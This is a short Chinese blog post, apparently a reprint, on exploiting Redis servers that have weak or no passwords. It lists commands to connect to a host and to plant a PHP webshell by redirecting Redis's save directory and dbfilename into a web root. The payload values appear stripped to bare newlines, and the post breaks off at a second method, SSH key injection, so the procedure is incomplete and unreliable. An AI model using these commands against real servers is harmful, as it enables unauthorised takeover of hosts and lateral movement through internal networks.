Redis被公司大量应用,成为了攻击者最喜欢的猎物之一,大量的木马病毒也广泛利用redis漏洞在内网疯狂传播,对内网扫描、控制、感染、挖矿、勒索等行为和事件层出不穷。然而Redis的利用方式你真的全部了解吗?
你的redis安全吗?设置密码了吗?密码是否太弱?
当redis口令过弱,或者使用了一些频率过高的密码(被密码字典收录),甚至没有设置密码,这个时候你的redis很可能已经被非法用户恶意访问。
redis-cli.exe -h 192.168.86.145
info
只查看redis数据库的部分信息显然不是攻击者的目标,他们想要的是通过redis控制这台主机,再通过这台服务器在内网漫游,控制更多的主机,最后拿到核心数据库。
1.利用redis写入webshell利用redis直接写入webshell,需要绝对路径,并且需要写入权限。
config set dir /var/www/html/
set x "\n\n\n\n\n\n"
set xx "\n\n\n\n\n\n"
config set dbfilename shell.php
save
2.写入ssh公钥文件使用私钥登录
(1
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)